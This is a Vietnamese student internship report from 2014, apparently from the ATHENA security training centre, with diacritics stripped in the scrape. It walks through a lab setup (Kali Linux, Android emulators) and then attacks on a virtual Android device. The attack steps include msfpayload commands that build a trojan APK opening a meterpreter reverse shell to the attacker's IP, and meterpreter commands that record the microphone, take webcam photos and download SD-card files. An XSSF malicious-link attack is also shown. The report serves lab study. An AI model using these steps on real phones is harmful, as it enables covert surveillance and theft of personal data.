BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ

Embed Size (px)

DESCRIPTION

Báo cáo thực tập ATHENA - Báo cáo giữa kỳ

Text of BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ

  • 1. BO CO THC TP August 16, 2014 Page 1 BO CO TI THC TP TI: NGHIN CU CC TROJAN, MALWARE CHO PHP NH CP, SP XP D LIU NH DANH B, TIN NHN TRN IN THOI S DNG ANDROID V GI RA NGOI. GIO VIN HNG DN: THY V THNG SINH VIN THC HIN: PHAN L TRC ANH BO CO GIA K (17/08/2014)
  • 2. BO CO THC TP August 16, 2014 Page 2 Ni dung: 1. Tn ti: Nghin cu cc trojan, malware cho php nh cp, sp xp d liu nh danh sch contact, tin nhn trn in thoi s dng android v gi ra ngoi. 2. Yu cu: Phn 1: Thc hin i vi mng LAN (c kt ni wifi) 1.1 Nghin cu h iu hnh Kali Linux. Ci t Kali Linux (hoc Back Track) 1.2 Nghin cu c ch to m c trn Kali Linux ni ring v Android ni chung. 1.3 Nghin cu cch tch hp m c vo cc phn mm v qung b qua mng x hi. 1.4 Thc hin khai thc data trong th sd card, camera ca smartphone. Phn 2: Thc hin trn mi trng Virtual Private Server VPS (server c internet) 2.1 Ci t autosploit trn VPS 2.2 To m c trn VPS 2.3 Cho php xm nhp vo android1, android2, android3 gi data t cc android v VPS
  • 3. BO CO THC TP August 16, 2014 Page 3 MC LC
  • 4. BO CO THC TP August 16, 2014 Page 4 I KALI LINUX V CCH CI T MY O KALI LINUX TRN VMWARE WORKSTATION Kali Linux l mt h iu hnh c xy dng trn nhn Linux, c thit k kim tra bo mt, th nghim xm nhp cc h thng my tnh. Kali Linux pht trin trn nn tng h iu hnh Debian, kh nng tng thch vi kin trc ARM c ci tin, n h tr mng khng dy tt hn, c kh nng ty bin cao v d dng nng cp gia cc phin bn Kali trong trng lai. Cc bc to mt my o chy Kali Linux trn phn mm VMware workstation. 1. Chun b: - My tnh c ci t phm mm VMware workstation. y ta s dng VMware workstation 10.0.0 - Download file ISO h iu hnh Kali Linux 64 bit phin bn 1.0.7 trn link www.kali.org/downloads 2. Tin trnh: Bc 1: Khi ng VMware. Vo File > New Virtual Machine (hoc Ctrl+N) Bc 2: Chn Type l Custom (advanced) > Next Bc 3: Yu cu file ci t my o, ta s chn I will install the operating system later > Next
  • 5. BO CO THC TP August 16, 2014 Page 5 Bc 4: Chn h thng l Linux, Version l Debian 7 64-bit > Next Bc 5: Chn vng lu my o v t tn my o l Debian 7 64 > Next
  • 6. BO CO THC TP August 16, 2014 Page 6 Bc 6: Cu hnh b x l l mc nh > Next Bc 7: Chn b nh RAM l 512MB > Next. Lu l phi ph hp vi my tht)
  • 7. BO CO THC TP August 16, 2014 Page 7 Bc 8: Chn loi Network l Bridged networking > Next Bc 9: Cp pht a cho my o. Ta cp pht Maximum l 15GB. Chn Store virtual disk as a single file > Next
  • 8. BO CO THC TP August 16, 2014 Page 8 Bc 10: Ta s tr file ISO vo my o va to. Click chut phi vo tn my o Debian 7 64 > Settings Tr dng CD/DVD (IDE) > phn Connection > Use ISO image file > Ta dn n file Kali Linux 64 bit.ISO Bc 11: My o c khi chy. Ti Boot menu > Chn Graphical install
  • 9. BO CO THC TP August 16, 2014 Page 9 Bc 12: Ta chn Language, Location, Keyboard > Continue Bc 13: Sau ta phi cu hnh Network > t Hostname > t Domain name > Continue Bc 14: To Users name v Password > Continue. Bc nay kh quan trng, root password l mt khu bn ng nhp vo my o Debian 7 64
  • 10. BO CO THC TP August 16, 2014 Page 10 Bc 15: Cu hnh Clock > Next Bc 16: Phn vng a > ta mc nh Guided use entire disk > Continue Khi xut hin yu cu Write the changes to disk? > chn Yes > Continue i Install System
  • 11. BO CO THC TP August 16, 2014 Page 11 Bc 17: Cu hnh Package manager > Xut hin yu cu Use the network mirror? > chn No > Continue Bc 18: Ci t GRUB boot loader > Install the GRUB boot loader to the master boot record? > chn Yes > Continue Bc 19: Ta i tin trnh ci t hon tt > Finish the Installation > Continue Bc 20: Sau khi hon tt, my o Debian 7 64 s t khi ng. Ta ng nhp vi User l root v Password t.
  • 12. BO CO THC TP August 16, 2014 Page 12 II NGHIN CU MALWARE, TROJAN V C CH TO M C TRN ANDROID 1. Khi nim Malware, Trojan: - Malware - Malicious Sofware c ngha l bt k phn mm my tnh c hi no c to nn vi nh xm nhp lm hi my tnh, thu thp thng tin, truy cp d liu nhy cm m ngi s dng khng h hay bit. Malware bao gm virus, worm, trojan horse, adware, spyware, keyloger, backdoor, rootkit - Trojan - Trojan Horse gi l phn mm gin ip. N l mt chng trnh phn mm c hi m khng c gng t ti to, thay vo n s c ci t vo h thng ca ngi dng bng cch gi v l mt chng trnh phn mm hp php. - Hin nay, malware ch xm nhp vo my tnh v nh cp thng tin ngi dng, n cha c c ch ly lan. Cch thc hot ng ca malware ging nh trojan ch khng nh virus ph hy. - n gin l malware v trojan gip tin tc truy cp vo my ngi dng, iu khin t xa, thu thp thng tin ngi dng 2. C ch hot ng ca Malware: Ly mt v d c th v 1 Malware rt ph bin trong thi gian va qua l Malware DroidDream. Malware ny hot ng qua 2 giai on: - Giai on 1: DroidDream c nhng vo trong mt ng dng (s lng ng dng cha Malware ny hin nhiu hn 50 ng dng) v s chim c quyn root vo thit b ca bn ngay sau khi bn chy ng dng trong ln s dng u tin.
  • 13. BO CO THC TP August 16, 2014 Page 13 - Giai on 2: T ng ci t mt ng dng th 2 vi mt permission c bit cho php quyn uninstall. Mt khi cc ng dng th 2 c ci t, n c th gi cc thng tin nhy cm ti mt my ch t xa v m thm ti thm cc ng dng khc Mt khi DroidDream chim c quyn root, Malware ny s ch i v m thm ci t mt ng dng th hai, DownloadProviderManager.apk nh mt ng dng h thng. Vic ci t ng dng h thng ny nhm ngn nga ngi dng xem hoc g b ci t cc ng dng m khng c php. Khng ging nh giai on u, ngi dng phi khi ng ng dng bt u vic ly nhim, giai on th 2 ng dng t ng lm mt s vic nh l confirm, checkin.Mt iu na khin cho bn khng th bit chng hot ng lc no, l Malware DroidDream ny c lp trnh lm hu ht cc cng vic ca mnh vo khong thi gian t 11h m ti 8h sng ngy hm sau. y l khong thi gian m in thoi t c kh nng c s dng nht. iu ny lm cho ngi dng kh khn hn trong vic pht hin mt hnh vi bt thng trn chic smartphone ca mnh. Hin nay cn c mt s Malware cn c kh nng nghe ln tt c cc cuc in thoi. Vn ny thc s nguy him khi tt c cc vn ring t ca chng ta ang b mt theo di, v vy nhng mi nguy him t m c trn android ang thc s e da n an s an ton ca ngi dng h iu hnh ny. 3. C ch hot ng ca Trojan: - Trojan c nhiu loi nhng ph bin l 2 loi: Trojan dng iu khin v Trojan dng nh cp mt khu. - Bc u c ch hot ng ca c 2 loi ny l ging nhau. My tnh s b nhim trojan qua tp tin nh km ca th in t, chng trnh tr chi, chng trnh no m bn v tnh chy th. N s t sao chp vo ni no trong my tnh. Sau n bt u ghi vo registry ca my cc thng s n c th t ng khi chy khi my tnh khi ng. - Tip theo, i vi trojan iu khin n s cho php tin tc t xa nm quyn iu khin my tnh. Cn i vi trojan nh cp mt khu, n lu mt khu ca ngi dng vo 1 file v t ng gi mail n tin tc khi my tnh kt ni mng.
  • 14. BO CO THC TP August 16, 2014 Page 14 III MY O ANDROID VIRTUAL DEVICE CCH TO MY O QUA PHN MM ECLIPSE Phn mm Eclipse c chc nng Android Virtual Device cho php ta to my o chy android (c th l smartphone, tablet) Thng qua cc my o ny ta c th nghin cu cch tch hp m c vo thit b chy android 1. Cc Tools cn thit ci t: - Phn mm Eclipse - B Java SE Development Kit - Android Developer Tools - Android SDK - B cng c Android Debug Bridge ADB - Cc ng dng c bn cho Android 2. Ti v ci t JDK Java SE Development Kit: Bc 1: Ti JDK ti http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads- 1880260.html Click chn Accept License Agreement Chn phin bn ph hp vi my tnh. y ta chn Windows x64
  • 15. BO CO THC TP August 16, 2014 Page 15 Bc 2: Sauk hi ti v, ta tin hnh ci t nh nhiu phn mm khc qua cc la chn Next. Cui cng click Close Bc 3: kim tra li vic ci t JDK. Ta m cmd.exe G lnh java
  • 16. BO CO THC TP August 16, 2014 Page 16 3. Ti v Eclipse Android Developer Tools v Android SDK: Lu khi ta ti v b ny, s gm c phn mm Eclipse Bc 1: Ti v ti link http://developer.android.com/sdk/index.html Click vo I have read and agree v chn phin bn 64-bit Click Download Bc 2: Gii nn file va ti v. Chy SDK Manager.exe Lu l c th gp li Fetching https://dl-sll... Failed to fetch Close thng bo ny li. Xut hin ca s Choose Packages to Install. Nu ca s ny rng > Cancel Quay v ca s Android SDK and AVD manager > Settings > Tick vo Force https://... Nu khng b li ny, th s xut hin ca s Android SDK Manager Ta chn cc Packages mun ci. V Install
  • 17. BO CO THC TP August 16, 2014 Page 17 Bc 3: Ti ca s Choose Packages to Install > Tick vo Accept License > Install > Ch hon tt
  • 18. BO CO THC TP August 16, 2014 Page 18 4. Tch hp Android SDK vo Eclipse: Sau khi c phn mm Eclipse v b Android SDK, ta cn tch hp li s dng Bc 1: M eclipse.exe trong th mc gii nn file Eclipse Android Developer Tools v Android SDK ti trn D: Softadt-bundle-windows-x86_64-20140702eclipseeclipse.exe Bc 2: Vo Help > Install new software > Add > Name: g tn tool mun t > Location: g a ch ti v ADT https://dl.google.com/android/eclipse hoc https://dl-ssl.google.com/android/eclipse > OK Bc 3: ca s Name > Tick vo Developer Tools Bc 4: Chn cc Next > Next > Accept > Next > Finish Run in Background Bc 5: Vo Windows > Preferences > Android > Browse > Ch ng dn th mc Android SDK ti > Apply > OK
  • 19. BO CO THC TP August 16, 2014 Page 19 Bc 6: Khi ng li Eclipse 5. To my o chy Android trn phn mm Eclipse: Android Virtual Device l my o cho developer pht trin ng dng. Sau y l cc bc to 1 AVD trn Eclipse Bc 1: M eclipse.exe > Vo Windows > Android Virtual Device Manager > Bc 2: Thit t cc thng s cn thit: Name: t tn cho thit b
  • 20. BO CO THC TP August 16, 2014 Page 20 Device: Chn loi thit b bn mun to Target: Chn phin bn h iu hnh Skin: chn kch c mn hnh bn mun, thng th phi ph hp vi Device chn trn SDcard: chn th nh o cho AVD. Bc 3: Click OK to my o. Khi chy bng nt Start > Launch Bc 4: Ch hon tt, ta c my o chy Android
  • 21. BO CO THC TP August 16, 2014 Page 21 IV MY O ANDROID TRN PHN MM GENYMOTION THNG QUA VIRTUALBOX Phn mm Genymotion v VirtualBox cho php ta to my o chy android (c th l smartphone, tablet). Thng qua cc my o ny ta c th nghin cu cch tch hp m c vo thit b chy android. 1. Cc Tools cn thit ci t: - Phn mm Virtual Box. - Phn mm Genymotion. - B cng c pht trin Java SE Development Kit. - B cng c Android SDK Manager. 2. Ti v ci t JDK (Java SE Development Kit) v Android SDK Manager: Phn ti v ci t c hng dn v thc hin mc III ca Bo co ny. 3. Ti v v ci t phn mm to my o VirtualBox: Ta c th bn VirtualBox ph hp vi my ca bn. - Bc 1: Ta ti v file ci t VirtualBox ti trang: http://www.oracle.com/technetwork/server- storage/virtualbox/downloads/index.html Bc 2: Sau khi ti v, ta tin hnh ci t nh nhiu phn mm khc:
  • 22. BO CO THC TP August 16, 2014 Page 22 Bc 3: Next > Next > Next > Install > Finish Bc 4: Giao din phn mm sau khi ci t xong.
  • 23. BO CO THC TP August 16, 2014 Page 23 4. Ti v v ci t ng dng Genymotion: Bc 1: Trc khi bt u, ta cn c 1 ti khon trn web www.genymotion.com Ta c th ng k min ph v ti Genymotion v my. Bc 2: Bt u ci t phn mm Genymotion. Ta la chn ngn ng ci t > OK > Next Bc 3: Chn th mc lu ci t. Bc 4: Next > Next > Install > Finish
  • 24. BO CO THC TP August 16, 2014 Page 24 Bc 5: M Genymotion va ci t xong. Ta vo thit t 1 s thng s mc Settings Bc 6: Nhp Username v Password m bn ng k trn web www.genymotion.com th General Bc 7: th ADB > chn Use custom Android SDK tools > Browser ng dn n th mc sdk trong th mc m ta ti Android SDK Manager. Sau lu li ci t. F: Softadt-bundle-windows-x86_64-20140702sdk
  • 25. BO CO THC TP August 16, 2014 Page 25 5. To my o chy Android trn Genymotion kt hp VirtualBox: Bc 1: Ta m Genymotion ln to my o. Vo Add Bc 2: Chn tn thit b m mun lm my o. Xut hin cu hnh my o sp to:
  • 26. BO CO THC TP August 16, 2014 Page 26 Bc 3: Next > i my o t ng ti v t web v Finish qu trnh to my o. Bc 4: khi ng my o va to ta chn my o > Play
  • 27. BO CO THC TP August 16, 2014 Page 27 Bc 5: Giao din my o Google Nexus 7 va to thnh cng.
  • 28. BO CO THC TP August 16, 2014 Page 28 V TO M C TRN MY KALI LINUX V TN CNG VO THIT B ANDROID: 1. Cc cng c cn thit: thc hin to m c v tn cng vo thit b Android ta cn chun b: - My chy h iu hnh Linux phin bn Kali (hoc Back Track). y dng VMware to my o Kali ( c hng dn cch lm). - Thit b chy Android o. y dng Genymotion kt hp VirtualBox to tablet chy Android 4.3. - C 2 thit b u c th kt ni mng. - C ti khon email gi v nhn file trn c 2 thit b. 2. Tin trnh: Bc 1: Khi ng my tn cng Kali Linux v thit b nn nhn Android. Thit t card mng cho my tn cng Kali m bo kt ni c internet. Vo Edit > Virtual Network Editor Ti VMnet0 > Chn Type l Bridged > Chn card mng ca my tht Bridged to.
  • 29. BO CO THC TP August 16, 2014 Page 29 Bc 3: Kim tra IP ca my tn cng Kali bng lnh : ifconfig Bc 4: To 1 file cha m c v gi cho thit b Android. y ta to file ng dng *.apk v gi qua email.
  • 30. BO CO THC TP August 16, 2014 Page 30 Nhp lnh: msfpayload android/meterpreter/reverse_tcp lhost= lport= R > / V d lnh l: msfpayload android/meterpreter/reverse_tcp lhost=192.168.149.136 lport=8080 R > /root/Desktop/appsX.apk. - To ng dng ReverseTCP c trn file l appsX.apk. - a ch IP my tn cng l 192.168.149.136. - a ch Port l 8080 (Lu trnh s dng cc port thng dng t 0 n 1023). - Lu file ti Desktop. Bc 5: Khi ng ng dng Metasploit trn my tn cng Kali bng lnh: msfconsole Bc 6: Sau ta set cc payload, lhost, lport bng cc lnh: set payload android/meterpreter/reverse_tcp set lhost 192.168.149.136 set lport 8080
  • 31. BO CO THC TP August 16, 2014 Page 31 Bc 7: Thc hin lnh exploit bt u qu trnh tn cng. Bc 8: Ti thit b Android, sau khi ti v v ci t file appsX.apk, ta c ng dng MainActivity. Khi ng ln v nhp vo ReverseTCP.
  • 32. BO CO THC TP August 16, 2014 Page 32 Khi trn Kali ta nhn c thng bo c thit b truy cp vo lm nn nhn. Bc 9: Dng lnh help lit k cc lnh m ta c th thc hin c.
  • 33. BO CO THC TP August 16, 2014 Page 33 3. Khai thc thng tin h thng: Xem thng tin h thng bng lnh sysinfo. 4. Ghi m ln: Ghi m ln thit b nn nhn Android v lu v my tn cng Kali bng lnh record_mic. File ghi m c l xLijsRbg.wav lu t ng /root ca my Kali. 5. Khai thc webcam v chp nh ln: Kim tra danh sch webcam ca thit b nn nhn Android v thc hin chp nh ln, lu v my tn cng Kali bng lnh webcam_list v webcam_snap .
  • 34. BO CO THC TP August 16, 2014 Page 34 File nh chp c l FRumITki.jpeg lu t ng /root ca my Kali . 6. Khai thc file h thng ca my nn nhn: Kim tra cc file h thng ang hot ng bng lnh ps.
  • 35. BO CO THC TP August 16, 2014 Page 35 7. Khai thc d liu t SDCARD: Di chuyn vo b nh SDCARD bng lnh cd /sdcard. Dng lnh ls lit k danh sch cc th mc/tp tin c trong SDCARD. Xem cc tp tin m my nn nhn ti v qua lnh di chuyn th muc cd Download v lnh lit k ls. nh cp v ti v tp tin bt k bng lnh download . y dng lnh download appsX.apk. Tp tin appsX.apk va nh cp v c lu t ng trong /root ca my tn cng Kali. 8. Kt thc tn cng: Dng lnh exit thot khi Metasploit v kt thc qu trnh tn cng.
  • 36. BO CO THC TP August 16, 2014 Page 36 VI TN CNG VO THIT B ANDROID THNG QUA LIN KT CHA M C: 1. Cc cng c cn thit: tn cng vo thit b Android thng qua lin kt cha m c ta cng cn chun b nh tn cng bng file m c trn: - My chy h iu hnh Linux phin bn Kali (hoc Back Track). y dng VMware to my o Kali ( c hng dn cch lm). - Thit b chy Android o. y dng Genymotion kt hp VirtualBox to tablet chy Android 4.3. - C 2 thit b u c th kt ni mng. - C ti khon email gi v nhn thng tin lin kt trn c 2 thit b. 2. Tin trnh: Bc 1: Khi ng my tn cng Kali Linux v thit b nn nhn Android. Bc 2: my Kali > M Terminal > thc hin 3 lnh sau cp nht Framework msfupdate cd /opt/metasploit/apps/pro/msf3 svn export http://xssf.googlecode.com/svn/trunk/ ./ --force Bc 3: Khi ng Metasploit bng lnh msfconsole
  • 37. BO CO THC TP August 16, 2014 Page 37 Bc 4: Vo XSSF bng lnh load xssf Port=80 Uri=/xssf/ Public=true Mode=Verbose Bc 5: Thc hin lnh xssf_urls Ta nhn c cc urls (ng dn web http) nh ca XSSF Server, XSSF test page, XSSF logs page
  • 38. BO CO THC TP August 16, 2014 Page 38 Bc 6: Cho my nn nhn truy cp vo ng dn XSSF test page: http://192.168.149.136:80/xssf/test.html Ta nhn c thng bo trn my tn cng Kali: 3. Kim tra s lng nn nhn ang truy cp vo ng dn m c: Ta dng lnh xssf_victims kim tra s lng nn nhn truy cp vo ng dn m c http://192.168.149.136:80/xssf/test.html 4. Xem thng tin v nn nhn ang truy cp: Dng lnh xssf_information y v d l xssf_information 1
  • 39. BO CO THC TP August 16, 2014 Page 39 5. Khai thc d liu t my nn nhn: u tin ta dng lnh search auxiliary/xssf kim tra cc quyn m ta c th thao tc ln my nn nhn Gi Thng bo XSSF n my nn nhn qua lnh: use auxiliary/xssf/public/misc/alert run
  • 40. BO CO THC TP August 16, 2014 Page 40 my nn nhn s nhn c cnh bo XSSF Thot ra msf bng lnh Ctrl+C > back Kim tra xem nn nhn c truy cp vo cc trang web thng dng hay khng bng lnh: use auxiliary/xssf/public/misc/visited_pages run Ci t 1 ng dn mi v qua kim tra thng tin my nn nhn ln na: use auxiliary/gather/android_htmlfileprovider set SRVPORT 87 set URIPATH / run
  • 41. BO CO THC TP August 16, 2014 Page 41 Ch nn nhn truy cp vo ng dn mi http://192.168.149.136:87/ Ta nhn c thng tin my nn nhn: 6. Thot khi XSSF ca Metasploit: thot khi ta thc hin cc lnh: Ctrl + C > back > exit > exit
  • 42. BO CO THC TP August 16, 2014 Page 42 VII BO CO TUN V VIDEO QU TRNH 1. Link bo co tun: http://www.slideshare.net/phanconghien/tuan1 http://www.slideshare.net/phanconghien/tuan2 http://www.slideshare.net/phanconghien/tuan3-4 2. Link video qu trnh thc hin: - Ci t Kali Linux trn VMware: http://youtu.be/90e-w3SGJnY - To my o Android Virtual Device trn Eclipse: http://youtu.be/7p9_0ojdmqs - To my o Android trn Genymotion v VirtualBox: http://youtu.be/DkxtthrNb9o - To m c trn Kali Linux v tn cng vo my o Android: http://youtu.be/iEawr1JupZ8 - To m c trn trang web bng XSSF: http://youtu.be/1Jw8F_H0Jz4 - Clip Gii thiu bn thn: http://youtu.be/iRfXCEXI9lo
  • 43. BO CO THC TP August 16, 2014 Page 43 VIII NGUN THAM KHO http://sinhvienit.net/forum www.kali.org/downloads http://forum.bkav.com.vn http://vi.wikipedia.org/wiki http://developer.android.com/sdk/index.html#download http://www.oracle.com/technetwork/java/javase/downloads http://choimobile.vn/forums/#thao-luan-hdh-android.62 http://www.oracle.com/technetwork/server- storage/virtualbox/downloads/index.html http://www.genymotion.com/ http://www.whitehat.vn/threads/ Gio trnh kha hc System Hacking Trung tm o to ATHENA www.Athena.Edu.Vn